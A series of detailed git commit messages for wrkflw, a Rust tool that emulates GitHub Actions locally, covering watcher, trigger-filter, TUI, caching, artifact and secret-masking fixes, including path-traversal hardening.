Ctrl+C in `watch` was the other big one. We were using
`ShutdownSignal::never()` and relying on the global cleanup
handler's `process::exit(0)` to tear everything down, which meant
a workflow mid-execution got killed by the OS before the executor's
Docker/tempdir cleanup could run. Install a real
`tokio::signal::ctrl_c` handler that triggers the watcher's
shutdown; the global cleanup still runs after `run()` returns, so
we get a clean two-phase teardown instead of an orphaned-container
parade.
While at it, gather every stray constant (`GIT_COMMAND_TIMEOUT`,
`GIT_STATE_CACHE_TTL`, the glob recompile cost, the hardcoded
`"push"` in the TUI) into a single `TriggerFilterConfig` struct and
thread it through the three call sites (CLI prefilter, watcher hot
loop, TUI diff-filter). Having the same five numbers live in three
different places is not my idea of configurability. The config
also owns a process-wide LRU of compiled trigger configs keyed by
`(path, mtime)`, so toggling the TUI filter or re-running a watch
cycle no longer re-parses every YAML and recompiles every glob.
The watcher picks up three other fixes in the same spirit. The git
state cache now keys on `.git/HEAD`'s mtime on top of the TTL, so a
`git checkout` inside the 3s window is caught on the next cycle
instead of evaluating `branches:` filters against the pre-checkout
branch. The debouncer grows bounded (8192 pending paths by default)
and reports per-cycle drops via `WatchEvent.dropped_events` so a
`cargo clean && cargo build` burst can't grow the pending set to
tens of thousands of PathBufs. And the trigger-cache refresh task
now preserves the *previous* cache on panic instead of returning
`HashMap::new()` — a panicking refresh was previously forcing the
next cycle to re-parse every workflow from scratch, which is the
kind of performance cliff you only notice after the bug report.
Parser learned an allowlist of the documented GHA events and warns
(not errors — GHA adds events faster than we update lists) on any
name outside it, so a typo like `pul_request` surfaces once
instead of producing silent "no matching event" diagnostics
forever. `--changed-files` entries now get validated up front:
absolute paths, Windows drive letters, and `..` components get
rejected with a clear error instead of silently failing every
`paths:` glob.
TUI gains a working event selector. The `diff_filter_event` field
was sitting there hardcoded to `"push"` with a comment about
"future UI" — which is a nice way of saying the TUI was silently
lying about which pull_request/workflow_dispatch/schedule workflows
would run. Shift+D now rotates through the six common events and
re-runs the evaluation against the new one. The log buffer also
grew a cap (5000 lines, enforced at every `mark_logs_for_update`
call site) so a long-lived TUI with a lot of diff-filter toggling
doesn't slowly leak memory.
New tests cover every new behavior: LRU hit + mtime invalidation,
`normalize_user_changed_file` rejecting the bad shapes, the unknown
event warning, the debouncer cap counting drops without counting
deduped paths, HEAD-mtime cache invalidation, and the TUI log cap.
Full workspace still green, clippy silent, fmt clean.
Please don't add more file-local constants to this pipeline. Put
them in `TriggerFilterConfig`.
* fix(trigger-filter,watcher): plug parser, git, and worktree silent-skip holes
Another round of review fallout. Six things were wrong, bundled
because they all share the same failure mode: silently producing
"0 triggered" for the wrong reason and sending users chasing a
flag they never needed.
**`on: {}` and `on: []` were accepted at parse time** and then
surfaced as "Workflow does not listen to any events" from the
evaluator — with no workflow path, no YAML context, nothing. GHA
rejects both at upload time. Reject them here too, at parse,
where the error actually carries the file path and the user has
something to grep for.
**`git diff --name-only` and `git ls-files --others` were
newline-terminated.** So a file called `foo\nbar.txt` got
reported as two bogus half-entries, and any non-ASCII filename
came back as `\302\244`-style octal escapes that no `paths:` glob
could ever match. The fix is three characters: `-z`. Rip out the
old `parse_lines` helper and route everything through a new
`parse_nul_separated` that splits on NUL and tolerates the
trailing NUL git sometimes emits. Pinned with a real-git-repo
end-to-end test that commits a file whose name contains a
literal newline and asserts it survives the round trip.
**`head_mtime` stat'd `.git/HEAD` directly**, which returns None
on every linked worktree because in that layout `.git` is a
regular *file* containing `gitdir: /abs/path/to/real/gitdir`.
The watcher's git-state cache then served stale `(branch, tag)`
pairs until the bare TTL expired. Parse the pointer, resolve
relative paths the same way git does (against the `.git` file's
parent), and stat the real HEAD. Plain repos are unchanged.
**The `buffer_unordered` block in watcher.rs had a comment
claiming "Each future wraps a `tokio::spawn`".** It doesn't.
That's actively *load-bearing* — spawning would detach the
futures from the stream and let max_concurrent_executions be
silently ignored. Rewrite the comment to say what the code
actually does and why, so the next refactor doesn't "fix" it
into an unbounded fork bomb. Please don't do that.
**The path-filter diagnostic told users to "pass --diff or
--changed-files"** even when they had *already* passed `--diff`
and it had just come back empty. Confusion ensues. Add
`EventContext::changed_files_explicit`, set it to `true` in
every constructor that actually ran a diff (the three lib.rs
helpers and the watcher's in-tree path), and split the
diagnostic into two cases so "no diff run yet" and "diff was
empty" read differently.
While at it, mark `EventFilter`, `WorkflowTriggerConfig`, and
`TriggerMatchResult` `#[non_exhaustive]`. No external crate
constructs them today — they only read — so this costs nothing
now and buys room to add fields without a major bump later.
`EventContext` stays exhaustive because the watcher builds it
via struct literal and I'm not rewriting that.
Every fix has a pinned test. `cargo test --workspace` is
629/629. `cargo clippy --all-targets` clean. `cargo fmt` clean.
* fix(trigger-filter,watcher,ui,wrkflw): kill dead plumbing and unlock the pattern cache
Staff-level review of the diff-aware watch branch came back with a
pile of findings. Most were easy, but three of them were actually
embarrassing and needed to go before anyone else looked at this.
First, `PATTERN_CACHE` was holding its mutex *across* the blocking
YAML parse + glob compile in `load_trigger_config`. The whole point
of a process-wide LRU is that concurrent callers hitting different
files don't pay for each other's parses — and we were doing the
exact opposite. One slow network-mounted workflow file would stall
every other caller in the process until it finished. Release the
lock on a miss, parse, re-acquire to insert. Racing duplicate
parses on the same file are harmless because late-writer-wins
produces the same value.
Second, `TriggerFilterConfig` shipped two config knobs —
`git_timeout` and `strict_missing_context` — that had builder
setters, had unit tests pinning the builder setters, and were read
by *absolutely nothing* in the library. The timeout lived as a
file-local const in `git.rs` and strict-mode was implemented
entirely in the CLI. Shipping non-functional config knobs is
precisely the kind of drift this crate has been iteratively
patching, so I deleted them rather than half-wiring them. If
anyone ever needs the git timeout override, thread `Duration`
through `run_git` first and add the field at the same commit.
Third, `KNOWN_GHA_EVENTS` contained `pull_request_comment`, which
is not a real GitHub Actions event. Comments on PRs arrive as
`issue_comment` (PRs are issues). Leaving this in the typo-
detection allowlist silently masked the exact warning the function
exists to produce. One-word fix, regression test pinned.
While at it, I cleaned up the other findings:
- Library logging coupling: `collect_unknown_event_warnings`
(renamed from `warn_on_unknown_events`) and
`get_changed_files_with_warnings` no longer dual-emit via
`wrkflw_logging::warning` AND the return value. They collect
warnings as data; hosts own the rendering policy. Warnings now
ride through a new `WorkflowTriggerConfig::warnings` field in
addition to `EventContext::warnings`. The CLI prefilter renders
both. The one remaining library log call is the verbose-gated
`info!` in `get_default_diff_base` — opt-in, informational, not
dual-emission, and fixing it requires signature cascades I
didn't want in this commit.
- `Debouncer::MAX_SETTLE_ROUNDS` was hardcoded to 3. That was
tuned for the default 500ms debounce (3 × 500 = 1.5s worst
case) but a user passing `--debounce 5000` would see a 15s
worst-case drain delay under sustained churn. Replaced with a
wall-clock `MAX_SETTLE_BUDGET = 1500ms` and a dynamic round
cap derived from the debounce window. Preserves the old
behavior at 500ms and caps long windows correctly.
- `head_mtime` was reachable only via `git::head_mtime`, with the
watcher reaching into a sibling crate's `pub` module. Re-export
at the crate root so the coupling is explicit.
- `normalize_user_changed_file` didn't reject embedded NUL bytes.
NUL is not a valid pathname byte on any supported platform, and
letting one through would only produce downstream confusion.
Reject at the boundary with the rest of the input validation.
- `wrkflw watch` had no CLI flag for `extra_ignore_dirs`. The
watcher supported the knob but users couldn't pass extras
without patching source. Added `--ignore-dir`, comma-separated
or repeated.
- `apply_activity_type` was a one-line function called from one
site. Inlined it.
- `cycle_diff_filter_event` re-ran the evaluation by calling
`toggle_diff_filter` twice in sequence — correct but cryptic.
Extracted `rerun_diff_filter_if_active` so the idiom is named
for what it does.
All 332 tests in the workspace still pass, plus the new
regression pins. Clippy clean, fmt clean.
* fix(ui,watcher): plug TUI warning drop + kill double-toggle fragility
Another review pass. The TUI diff filter was *silently* dropping
every `EventContext::warnings` and every `WorkflowTriggerConfig::warnings`
on the floor — exactly the silent-skip failure mode this entire PR
has been fighting for 28 commits. The library deliberately routes
those diagnostics through struct fields instead of logging them
directly, because hosts own the rendering policy. The CLI prefilter
at crates/wrkflw/src/main.rs does the right thing. The TUI just
didn't.
It turns out that 'hosts own the rendering policy' is a contract
the compiler can't enforce. A git ls-files --others safe-directory
rejection, an 'on: pul_request' typo, a corrupted index — none of
it reached the log pane. User saw '0/N would trigger' with no clue
why.
Let's fix that. DiffFilterReport grows a warnings: Vec<String>
field. evaluate_diff_filter now drains context.warnings via
mem::take and harvests each parsed config's .warnings with the
workflow path prefixed, then check_diff_filter_results renders
them under a 'Diff filter: N warning(s)' line, mirroring the CLI
prefilter byte-for-byte. New regression test pins it.
While at it, rerun_diff_filter_if_active was implemented as two
consecutive toggle_diff_filter() calls. Clever. Also fragile: the
whole thing worked only as long as toggle_diff_filter stayed purely
idempotent in opposing directions, and a future side effect
(metrics, tracing, throttle) would have silently broken the rerun
path with zero compile-time signal. Extract spawn_evaluation() and
abort_in_flight_evaluation() as named helpers so the control flow
matches the intent. The existing abort-flag regression tests still
pin the tricky state-machine invariants through the refactor.
And the Debouncer::MAX_SETTLE_BUDGET doc claimed a hard 1.5s cap
on drain latency that the code doesn't actually enforce when the
user passes a debounce window longer than the budget — a single
tokio::time::sleep is not preemptible and the inner sleep runs the
full user-supplied duration. This is not great, but the alternative
(chopping up the inner sleep) would starve the legitimate coalescing
cases. Soften the doc to describe the real worst case instead of
lying about a cap. The pinning tests already cover both short- and
long-window paths.
Minor: help overlay documents 'd' (toggle diff filter) but not
Shift+D (cycle event). Add the missing line.
* fix(trigger-filter,watcher,wrkflw,ui): plug review holes and enforce warning drain
A code review turned up three real correctness bugs and a handful
of latent traps. Rather than patch them piecemeal, fix the whole
batch in one go so the contract that ties them together — "never
silently drop a diagnostic" — is actually load-bearing in the type
system and not just a convention nobody remembers to follow.
The three correctness bugs first:
1. `cached_git_state` was capturing `head_mtime` *after* the two
git reads. The doc comment claimed this was fine because "a
checkout between the read and the store will show up as an
mtime mismatch on the very next call" — it turns out the
comment was wrong. If a checkout lands between the branch/tag
reads, we store the post-checkout mtime alongside the
pre-checkout branch, and the very next lookup's stat matches
the stored value and happily serves the stale branch until
the TTL expires. Move the mtime capture *before* the git
reads so a race produces a visible mismatch. Regression
test interleaves a real `git checkout` between cache calls.
2. `collect_workflow_files_blocking` was returning
`Err(NoWorkflows)` for an empty directory. Watch mode's
entire value proposition is "react to files that don't exist
yet", so refusing to start on an empty `.github/workflows`
is actively wrong. Worse: mid-session, if the user deleted
every workflow file, the rescan failed, the watch loop fell
back to the stale snapshot, and `refresh_trigger_cache_blocking`
retained the deleted entries in the compiled-pattern cache.
So the evaluator kept running against workflows that no
longer existed. Let's fix that. Empty dir is now `Ok(vec![])`,
the watcher logs an info line and carries on, and the
`retain` step correctly evicts stale entries.
3. The pattern cache was keyed on mtime alone. On FAT32 and
some SMB/NFS configs, two edits within the mtime resolution
window (1-2 seconds) collide, and the second parse gets
served a stale compiled config. Combine `(mtime, len)` as
the key — size changes catch the overwhelming majority of
iterative edits, and it's free because we were already
reading the metadata. A content hash would close the
remaining gap but would require a full file read on every
lookup, which is precisely what the cache exists to avoid.
The bigger structural change is the warning-drain contract.
The trigger-filter crate routes non-fatal diagnostics (unknown
event names, `git ls-files --others` failures) through struct
fields instead of calling `wrkflw_logging::warning` directly,
so hosts own the rendering policy. That's the right design.
But it was enforced entirely by convention, and convention is
not a type system.
Proof: `refresh_trigger_cache_blocking` in the watcher was
silently dropping `WorkflowTriggerConfig::warnings` on the
floor. Nobody noticed because the field was a plain
`Vec<String>` and forgetting to iterate it had no consequences.
Exactly the silent-skip mode the rest of this PR exists to
prevent.
Let's fix that too. New `MustDrainWarnings` newtype with a
`debug_assertions`-gated `Drop` impl that `eprintln!`s when a
non-empty buffer is dropped without being observed via `take()`.
Release builds carry zero overhead. Tests and CI catch the
regression immediately. `EventContext::warnings` and
`WorkflowTriggerConfig::warnings` now use it, every host drains
explicitly (`take()`, not read-only iteration), and the watcher
site that was dropping warnings on the floor now routes them
through `wrkflw_logging::warning` at insert time.
One subtlety: the library's LRU cache stashes a clone of the
parsed config alongside the original it returns to the caller.
The clone's warnings would otherwise trip the Drop check on
eviction. Drain them at insert time — the returned original
still carries the full set for the first observer, and
subsequent cache-hit callers see empty warnings, which is the
correct UX (a first-parse diagnostic should not be re-logged
on every cache hit).
While at it, a few opportunistic cleanups the review flagged:
- `run_trigger_prefilter` returns `Result<PrefilterDecision,
String>` instead of calling `std::process::exit` from half
a dozen sites deep inside the body. The flag matrix is now
unit-testable without spawning a subprocess; three new
tests pin the "directory path", "missing path", and
"non-matching skip" branches.
- The `--strict-filter` / `--no-strict-filter` coalescing
was duplicated across the `run` and `watch` handlers. Extract
`effective_strict_filter(strict, no_strict)` so a third host
can't pick up a slightly different version of the same
bool-toggle pattern.
- `normalize_user_changed_file` was accepting whitespace-only
and empty path components (`src/ /foo.rs`, `src//foo.rs`,
trailing slash). These silently fail every `paths:` glob at
evaluation time — exactly the kind of input the function
exists to reject up front. Reject them with a clear "your
flag was wrong" message.
640+ tests passing across the workspace, clippy clean with
`-D warnings`. Nine new tests cover the fixes, each with a
comment naming the prior failure mode so a future refactor
can't silently regress them.
* fix(trigger-filter,watcher,wrkflw): plug the last six review holes
Review pass flagged eight items. Six code fixes, two coverage
gaps — close all of them so the branch can land without carrying
documented regressions.
The biggest one: the `PATTERN_CACHE` docstring promised that the
CLI, the TUI, and the watcher all shared one parse per (path,
mtime) across the process. It turns out they didn't. Each host
handed `load_trigger_config_cached` a different `PathBuf` shape
— raw user input vs relative `read_dir` output vs canonicalized
notify paths — so each host effectively maintained its own
de-facto private cache entry. The cross-host sharing was pure
aspiration.
Fix is to canonicalize inside the cache lookup via
`canonicalize_allowing_missing` (promoted out of the watcher
crate since three consumers need it now) and rewrite
`workflow_path` back to the caller's original form on return so
UI labels still show what the user typed.
Two more loop-discipline oversights in the watcher.
`debouncer.drain().await` sat outside any `tokio::select!`
against the shutdown signal, so Ctrl+C during an active drain
had to wait up to the full debounce window before the loop
observed it. Every other await in `run()` is cancellation-aware
— this one was the last outlier. And the per-cycle callback
supervisor was a detached `tokio::spawn`: correct on the happy
path, but a stuck reporter accumulates one task per cycle
forever because the runtime's own reaper is the only thing
polling the handle. Now held in a `JoinSet`, reaped via
`try_join_next` at the top of each iteration, with a one-shot
warning when the backlog crosses eight.
The rest is smaller. `--max-pending-events` no longer advertises
a misleading `default: 0` in `--help`; the flag is
`Option<usize>` and `Some(0)` is explicitly rejected since a
zero cap would drop every event. The parser gets a doc note
explaining why the duplicate-event-key concern the reviewer
raised is not reachable on `serde_yaml >= 0.9.4` —
`parse_workflow` errors upstream before ever hitting
`parse_events`. Don't remove it; add the HashSet-walk defence
only if someone swaps in a permissive YAML loader.
Two new tests pin the `PATTERN_CACHE` concurrency contract and
the `--diff-head` without `--diff-base` branch in
`build_event_context`. Both were docstring claims that nothing
actually exercised, which is how these things rot in the first
place.
Version bump to 0.8.0 and the README breaking-change section
are deferred to a follow-up PR so the release ceremony isn't
entangled with the code review.
* fix(trigger-filter,watcher,wrkflw): plug four more review holes
Four things the previous round missed, in order of how much they
would have hurt in production.
The callback supervisor JoinSet in the watcher had a warning
threshold but no hard cap. That's cute when the reporter is
*momentarily* slow, but a truly wedged reporter (deadlocked file
sink, stuck network webhook) just accumulates one supervisor per
cycle forever — the warning never reclaims anything, and memory
grows for the life of the session. Add `SUPERVISOR_HARD_CAP = 128`
and drop the current cycle's `WatchEvent` when we hit it. Loud
error, one-shot latch with hysteresis on the reclaim path, the
watch loop keeps running. Not pretty, but the alternative is
eventually having the OOM killer express an opinion.
`parse_nul_separated` was calling `from_utf8_lossy` on every
record, which silently replaced invalid UTF-8 bytes with U+FFFD
and left the file in the change set under a name that could not
match any real glob. This is the exact "silently lying about
which workflows would run" failure mode the rest of the crate
has been fighting, and it was hiding right inside the NUL
parser. Collect the lossy names in a separate list and surface
them via `EventContext::warnings` so the user at least sees
*which* file was dropped from the filter's view.
Strict-filter default-on (`wrkflw run --event push` now exits
1 without `--diff`/`--changed-files`) is a visible CLI behavior
change and the commit message was the only place it was
documented. That's not great. Add a BREAKING_CHANGES.md entry
with migration examples for each escape hatch, exit-code
semantics, and a pointer at `--no-strict-filter` for scripts
that cannot move yet.
While at it, flesh out the `LOG_BUFFER_CAP = 5000` comment in
the TUI (why not 1000, why not 20000, what the two dominant
log sources are), extract the supervisor constants to module
level so they can be reasoned about, and add tests the review
flagged as missing: a compile-time invariant on the supervisor
cap ordering, a runtime test that shutdown still unblocks
`run()` when the reporter callback is wedged (release-gated
blocking thread so cargo can reap it), and three prefilter
tests pinning the strict-mode rejection paths for
`--event`-alone and `pull_request`-without-`--base-branch`.
|
||
|
|
faf1af6ff5 |
fix(validators): reject non-mapping env values in validate (#90)
It turns out that `wrkflw validate` was happily accepting
`env: VAR=value` — a bare string — when GitHub Actions *only*
allows mappings for env. The reason is that the validate path
(evaluate_workflow_file) runs its own structural validators
but never actually checks the type of env fields. The JSON
schema gets it right, but it's only wired up in the parser
path, not the validator.
Add a validate_env() helper that checks env is either a YAML
mapping or an expression string (${{ }}), and wire it into
all three levels: top-level, job-level, and step-level. Tests
included for each.
Closes #89
|
||
|
|
36c1aa16f3 |
feat(executor): add artifact, cache, secrets, and inter-job output support for GitHub Actions emulation (#88)
* feat(executor): close major GHA expression and inter-job gaps
The expression evaluator was basically living in a fantasy world
where every step succeeds, secrets don't exist in expressions,
and jobs can't talk to each other. That's not how GitHub Actions
works, and it meant a *lot* of real-world workflows would silently
produce wrong results or just fail to resolve context variables.
Here's what was broken and what's fixed:
Step outcome/conclusion were hardcoded to "success" — always.
So `if: steps.build.outcome == 'failure'` would never be true,
and `continue-on-error` semantics were completely wrong.
ExpressionContext now tracks real outcome (before continue-on-error)
and conclusion (after). The success()/failure()/cancelled() builtins
now consult actual job state instead of returning constants.
secrets.* was not available in expressions at all. You could use
SecretSubstitution for env var injection, but `if: secrets.TOKEN`
in a conditional? Nope, just resolves to null. Pre-resolve all
referenced secrets into a HashMap at job start and thread it through
the expression context. Evaluator stays synchronous.
needs.* context didn't exist. Job outputs were computed and then
thrown away — nothing flowed between job batches. Add outputs field
to JobResult, resolve job-level output mappings from step outputs,
accumulate across batches in the main execution loop, filter to
declared needs dependencies, and wire into ExpressionContext.
jobs.* context gets the same treatment for free.
While at it, add three new modules that were completely missing:
- artifacts.rs: Local ArtifactStore for actions/upload-artifact
and actions/download-artifact emulation. Filesystem-based,
Arc<RwLock> for cross-job sharing.
- cache.rs: Persistent CacheStore under ~/.wrkflw/cache/ for
actions/cache emulation. SHA-256 keyed with prefix matching
for restore-keys.
- workflow_commands.rs: Parser for ::error::, ::warning::,
::set-output::, ::add-mask::, ::group:: and friends from
step stdout. Handles stop-commands/resume semantics.
414 tests pass, 0 failures, clippy clean.
* fix(executor): fix matrix job context gaps and parameter explosion
The previous commit added expression context enrichment (secrets,
needs, step outcomes) but only wired it into the non-matrix execution
path. Matrix jobs — arguably the *most common* GHA pattern — were
silently getting empty contexts for everything. So secrets.* in a
matrix job? Null. needs.* from an upstream job? Null. steps.X.outcome
after a failure? "success". Brilliant.
It gets worse. Job outputs were keyed by job_result.name, which for
matrix jobs is the display name ("build (os: ubuntu)") rather than
the canonical job key ("build"). Since build_needs_context looks up
by the canonical name from job.needs, matrix job outputs were being
accumulated and then *never found* by downstream jobs.
While at it, unknown step IDs were defaulting to "success" instead
of null, which means `steps.nonexistent.outcome == 'success'` was
true. That's not how GitHub Actions works.
Here's what's fixed:
- Thread secrets, needs context, and step status tracking through
MatrixExecutionContext into execute_matrix_job. Pre-resolve secrets
once before the parallel fan-out, not per-combination.
- Add canonical_name field to JobResult and key the accumulation maps
by it. Matrix combinations use last-write-wins, matching GHA.
- Track step_status_map and job_status_str in the matrix step loop,
mirroring what execute_job already does.
- Resolve job outputs in execute_matrix_job instead of returning
an empty HashMap.
- Thread secrets into execute_composite_action (GHA composites
inherit the calling workflow's secrets).
- Fix unknown step ID fallback from "success" to Null.
- Refactor preprocess_expressions (10 params → 3) and
evaluate_condition_with_context (9 params → 2) to accept
ExpressionContext directly. Every new context dimension was
requiring changes to 30+ call sites. Not anymore.
274 tests pass, clippy clean.
* fix(executor): address review findings from GHA emulation PR
The previous two commits closed a bunch of GHA expression gaps, but
the review turned up several things that shouldn't ship as-is.
The worst offender: execute_composite_action was passing
step_statuses: &HashMap::new() and job_status: "success" as
*constants* into every step execution. So steps.X.outcome inside
a composite action? Always Null. success()/failure()? Always
true/false. Composite actions with conditional steps based on
prior step results were quietly broken.
Fix that by tracking composite_step_statuses and
composite_job_status within the composite loop, same pattern as
execute_job and execute_matrix_job.
While at it:
- Extract record_step_status() to deduplicate ~15 identical lines
of StepStatus-to-string conversion + map insertion that were
copy-pasted between execute_job and execute_matrix_job. Those
were one edit away from diverging.
- Derive Copy on StepStatus (it's a fieldless enum — cloning it
was just noise) and add Display so we stop writing the same
match arm in three places.
- Pass actual job_status_str into resolve_job_outputs instead of
hardcoding "success". If a job output expression references
success()/failure(), it should get the real answer.
- Change CacheStore::new() from Option<Self> to Result<Self, String>
so callers can actually tell *why* cache init failed instead of
getting a silent None.
- Downgrade artifacts and cache modules from pub to pub(crate) —
they're not wired into the engine yet, so exposing them as public
API is just asking for someone to depend on an unstable interface.
- Replace Box::leak in expression.rs tests with lazy_static
constants. The leaks were harmless in practice but fragile if
anyone ever puts empty_ctx() in a loop.
274 tests pass, clippy clean.
* feat(executor): wire up artifact, cache, and workflow command modules
Three modules — artifacts.rs, cache.rs, workflow_commands.rs — were
sitting in the crate fully implemented, fully tested, and fully
*unused*. 751 lines of dead code that the compiler was rightly
complaining about. Let's fix that.
ArtifactStore now gets created per workflow run and threaded through
the entire execution context chain (execute_job_batch → job_with_matrix
→ matrix_job → StepExecutionContext). actions/upload-artifact and
actions/download-artifact are emulated inline in execute_step(),
following the same pattern as actions/checkout.
CacheStore is stateless (filesystem-backed at ~/.wrkflw/cache/), so
it gets created on-demand — no threading needed. actions/cache does
restore-or-save in one shot and writes cache-hit to GITHUB_OUTPUT.
Not the full dual-phase model GHA uses, but good enough for local
emulation.
Workflow commands (::set-output::, ::error::, ::warning::, etc.) are
now parsed from step stdout via process_workflow_commands() in all
three step loops (execute_job, execute_matrix_job, composite action).
The deprecated ::set-output:: feeds into step_outputs_map *before*
GITHUB_OUTPUT file processing, so the modern mechanism takes
precedence. ::add-mask:: is logged but not wired to SecretMasker yet
because that requires Arc<Mutex<>> wrapping — deferred to a follow-up.
While at it, added preprocess_with_value() so action with: params
get ${{ }} expression resolution before being used by the emulation
branches.
* fix(executor): fix review findings — cache lifecycle, secret duplication, path traversal
The PR review flagged several real issues. Let's go through them.
CacheStore was being created *per step* inside execute_step, while
ArtifactStore was sensibly created once per workflow run. This meant
parallel matrix jobs would race on the same ~/.wrkflw/cache/
directory with zero coordination. Promote CacheStore to per-run
lifecycle matching ArtifactStore, threading it through
JobExecutionContext → MatrixExecutionContext → StepExecutionContext.
resolve_secrets_for_context was called once in
execute_job_with_matrix (for the matrix path) and then *again* inside
execute_job (for the non-matrix path), completely wasting the first
resolution. Move the call before the matrix/non-matrix branch and
thread the result via a new secrets_context field on
JobExecutionContext.
ExpressionContext was constructed verbatim ~10 times across
engine.rs — 8 fields, every single time. Every new field meant
updating all 10 sites. Add expr_context() and
expr_context_with_env() methods to StepExecutionContext so
this boilerplate collapses to one-line calls.
While at it, add path traversal and symlink protections:
walk_files (artifacts) and copy_dir_contents (cache) now skip
symlinks; artifact upload validates glob results are within the
workspace via canonicalization; cache save/restore validates paths
don't escape the workspace.
* fix(executor): fix review findings — output context, reusable stores, path validation
It turns out that resolve_job_outputs was constructing its
ExpressionContext with an *empty* step_statuses map, so any job
output expression referencing steps.<id>.conclusion would silently
resolve to Null. Not great when you're trying to emulate GHA
faithfully.
While at it, the reusable workflow paths were each creating their
own ArtifactStore rooted at Path::new(".") instead of reusing the
parent workflow's stores. This meant artifacts uploaded in a parent
job were invisible to the reusable workflow, and vice versa. Same
story for inter-job needs context — reusable workflows were passing
empty HashMaps, so multi-job called workflows with `needs:` deps
would get nothing. Let's fix that.
The matrix output overwrite was a known GHA semantic edge case, but
we were silently clobbering previous combinations' outputs. Now we
at least warn about it so nobody spends an afternoon debugging why
needs.build.outputs only has values from the last matrix combo.
Also replaced the naive `path.contains("..")` check in cache path
validation with proper Path::components() inspection, because a
directory literally named "..bar" is not a traversal attack.
* fix(executor): close review findings — path traversal, JobStatus duplication, stale plan.md
The download-artifact emulation was joining user-provided `path`
input directly via ctx.working_dir.join() without ever checking
that the result stays inside the workspace. A crafted `with.path`
containing `../` could write artifact files anywhere on disk.
Add canonicalize + starts_with validation matching the pattern
already used in cache.rs. This was the only action emulation path
missing the check — upload-artifact and cache both had it.
While at it, add a Display impl for JobStatus to kill the three
identical match blocks converting status to "success"/"failure"/
"skipped" strings. StepStatus already had this — JobStatus just
got forgotten.
Also remove plan.md (development scratch file that snuck into the
branch), add TODO comments for reusable workflow secret propagation,
and clarify why GitLab pipelines pass empty needs context maps.
* fix(executor): close review findings — masker wiring, loop dedup, cache eviction
The code review flagged six issues ranging from "this will leak
secrets" to "this will eat your disk." Let's go through them.
The ::add-mask:: workflow command was being parsed and then *thrown
away*. The SecretMasker took &mut self for add_secret(), making it
impossible to call through the shared &SecretMasker references
threaded through step execution. Fix this by switching SecretMasker
to interior mutability (RwLock) so add_secret() takes &self. Now
process_workflow_commands() actually wires AddMask values into the
masker. Secrets no longer appear in plain text in output logs.
The step-execution loops in execute_job and execute_matrix_job were
copy-pasted with minor formatting differences — the kind of thing
that drifts apart over time until someone spends a week debugging
why matrix jobs don't process workflow commands the same way as
regular jobs. Extract a StepLoopState struct with a process_outcome
method that handles status recording, logging, command parsing, and
env file application in one place.
The cache at ~/.wrkflw/cache/ had no eviction and no size limit,
which is the kind of optimism I find *alarming* in something that
writes to the user's home directory. Add a 1 GiB cap with LRU
eviction by mtime, triggered automatically after each save.
While at it: fix cache.rs file_name().unwrap_or_default() to return
a proper error instead of writing to an empty filename, fix
artifacts.rs strip_prefix fallback to error instead of silently
using absolute paths, and aggregate reusable workflow outputs into
the parent JobResult instead of always returning an empty map.
14 new tests covering all the above. 292 tests pass, zero failures.
* fix(executor): harden artifact store, masker locks, and cache prefix matching
It turns out that ArtifactStore was happily accepting names like
"../../escape" and joining them directly onto the artifact root
path. That's a path traversal bug. The artifact name comes from
user workflow `with.name`, so *any* workflow could write outside
the artifact directory. Let's not do that.
Added sanitize_artifact_name() that rejects names containing path
separators, "..", null bytes, or leading dots. Both upload() and
download() now validate before touching the filesystem.
While at it, the upload/download methods were async functions that
did nothing but blocking std::fs calls — which blocks the tokio
runtime thread. Wrapped the file I/O in spawn_blocking so we stop
lying about being async.
SecretMasker's RwLock calls all used .unwrap(), which means a
single panic while holding a write guard poisons the lock and
cascades into panics on every subsequent access. Replaced with
.unwrap_or_else(|e| e.into_inner()) so we recover from poisoned
locks instead of bringing down the whole workflow execution.
CacheStore::find_by_prefix was returning whichever entry read_dir
happened to yield first — completely non-deterministic. Now scans
all entries and picks the one with the newest mtime, which matches
GitHub Actions' behavior of preferring the most recently created
matching key.
Also removed an unnecessary clone in StepLoopState::process_outcome
(Skipped arm was using ref + clone when it could just move), and
fixed pre-existing clippy warnings in the secrets crate tests.
* fix(executor): wrap CacheStore I/O in spawn_blocking, add missing tests
CacheStore was doing all its filesystem I/O — recursive directory
copies, eviction scans, the whole shebang — directly on the async
executor thread. ArtifactStore already knew better and used
spawn_blocking. CacheStore just... didn't. Let's fix that.
Make CacheStore Clone and move restore/save into async wrappers
that offload the real work to spawn_blocking. The internal logic
is unchanged, just properly sequestered where it won't block the
Tokio runtime.
While at it, document the cache save-on-miss divergence from real
GitHub Actions (we save eagerly; GHA uses a post-step hook), add
a proper doc comment explaining the RwLock poison recovery strategy
in SecretMasker, and add unit tests for build_needs_context and
resolve_job_outputs that were previously untested.
* fix(executor): close silent failure modes found in PR review
Four things came out of the review that were all variations of the
same theme: "something goes wrong and nobody hears about it."
The cache restore task was swallowing panics via `.ok()?`, which is
a lovely way to make debugging impossible. Match the error handling
pattern already used in save() — log the panic, return None.
The GITHUB_OUTPUT write for cache-hit was using `let _ =` to discard
I/O errors. This was the *only* silent error discard in the entire
module, which makes it feel less like a deliberate choice and more
like an oversight. Log the failure instead.
`secrets: inherit` on reusable workflows was silently ignored because
the code only handled the mapping case and inherit comes through as
a bare string. Emit an explicit warning so users know their secrets
aren't actually being inherited yet.
While at it, replace `&line[2..]` with `strip_prefix("::")` in the
workflow command parser. The starts_with check above guarantees
safety, but direct byte indexing is fragile and strip_prefix says
what it means.
* fix(executor): fix atomicity, eager save, and untested eviction
Three bugs found during PR review, all quietly waiting to bite
someone:
1. SecretMasker::add_secret() was doing two separate RwLock
acquisitions — one for secret_cache, one for secrets. A concurrent
mask() call between the two writes sees inconsistent state. The fix
is embarrassingly simple: put both collections behind a *single*
RwLock<SecretData>. One lock, one write, no window.
2. The actions/cache emulation was saving eagerly on cache miss,
right there in the step. Real GitHub Actions saves in a post-step
hook that only runs *after all steps complete* and *only if the job
succeeded*. Our eager save could persist stale or incomplete data
into ~/.wrkflw/cache/ and poison future runs. Defer saves into a
Mutex<Vec<PendingCacheSave>> on the step context, flush at
end-of-job conditional on success.
3. The eviction test was, shall we say, *aspirational*. It created
two tiny entries well under the 1 GiB limit, then asserted both
still existed. That's not testing eviction, that's testing storage.
Make max_size configurable on CacheStore, set it to 30 bytes in the
test, and actually verify the oldest entry gets evicted.
* fix(executor): close reusable workflow secrets gap, wire matrix env substitution
The reusable workflow path was passing `None, None` for
secret_manager and secret_masker into child execute_job_batch
calls. This meant that `${{ secrets.* }}` expressions inside
called workflows resolved to null even when the parent had
explicitly passed secrets via the `secrets:` mapping.
That's... not great. Pass the parent's secret_manager and
